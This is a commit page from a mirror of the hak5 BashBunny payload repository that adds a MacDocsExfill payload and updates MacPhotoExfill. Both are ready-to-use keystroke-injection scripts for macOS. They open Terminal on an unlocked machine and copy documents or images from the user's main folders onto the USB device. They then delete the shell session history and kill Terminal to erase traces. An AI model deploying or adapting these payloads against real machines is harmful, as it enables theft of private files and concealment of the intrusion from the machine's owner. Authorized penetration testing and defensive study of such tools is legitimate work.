hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update of MacPhotoExfill & Create MacDocsExfill (#588) 

* Update readme.md

* Update payload.txt

* Create MacDocsExfill

* Delete MacDocsExfill

* Add files via upload
pull/620/head
afsh4ck 2023-06-10 03:03:32 +02:00 committed by GitHub
parent 0279a82f4b
commit 37a4d9b42e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 165 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
payloads/library/exfiltration/MacDocsExfill/payload.txt Normal file
View File

@ -0,0 +1,78 @@
#!/bin/bash
#
# Title: MacDocsExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacDocsExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished
LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000
lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
LED STAGE 1
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
# Ensure sincronization
sync
# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
LED FINISH

46
payloads/library/exfiltration/MacDocsExfill/readme.md Normal file
View File

@ -0,0 +1,46 @@
# Mac Docs Exfilter for the BashBunny
_______ ______ ______ __ __
| \ / \ / \ | \ | \
| $$$$$$$\| $$$$$$\| $$$$$$\ | $$ | $$
| $$ | $$| $$ | $$| $$ \$$______ \$$\/ $$
| $$ | $$| $$ | $$| $$ | \ >$$ $$
| $$ | $$| $$ | $$| $$ __ \$$$$$$/ $$$$\
| $$__/ $$| $$__/ $$| $$__/ \ | $$ \$$\
| $$ $$ \$$ $$ \$$ $$ | $$ | $$
\$$$$$$$ \$$$$$$ \$$$$$$ \$$ \$$
* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration
# DESCRIPTION
Exfilter all the documents from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:
| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the docs in /root/Documents folder |
| Desktop | All the docs in /root/Desktop folder |
| Downloads | All the docs in /root/Downloads folder |
# IMAGE FORMATS
| Format |
| ------------------ |
| .docx |
| .xlsx |
| .pdf |
# LED STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |

45
payloads/library/exfiltration/MacPhotoExfill/payload.txt
View File

@ -2,7 +2,7 @@
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Version: 1.1
# Target: MacOS
# Category: Exfiltration
#
@ -27,7 +27,7 @@ QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
LED ATTACK
LED STAGE 1
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK STRING wait;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
# Ensure sincronization
sync
# Cleanup and delete proofs
LED M SLOW
QUACK ENTER
LED STAGE 2
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync
LED FINISH
LED FINISH

23
payloads/library/exfiltration/MacPhotoExfill/readme.md
View File

@ -1,17 +1,14 @@
# Mac Photo Exfilter for the BashBunny
* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
_______ __ __ ______ ________ ______ __ __
| \ | \ | \ / \| \ / \ | \ | \
| $$$$$$$\| $$ | $$| $$$$$$\\$$$$$$$$| $$$$$$\ | $$ | $$
| $$__/ $$| $$__| $$| $$ | $$ | $$ | $$ | $$ ______ \$$\/ $$
| $$ $$| $$ $$| $$ | $$ | $$ | $$ | $$| \ >$$ $$
| $$$$$$$ | $$$$$$$$| $$ | $$ | $$ | $$ | $$ \$$$$$$/ $$$$\
| $$ | $$ | $$| $$__/ $$ | $$ | $$__/ $$ | $$ \$$\
| $$ | $$ | $$ \$$ $$ | $$ \$$ $$ | $$ | $$
\$$ \$$ \$$ \$$$$$$ \$$ \$$$$$$ \$$ \$$
* Author: afsh4ck
@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
| Green Fixed | Finish |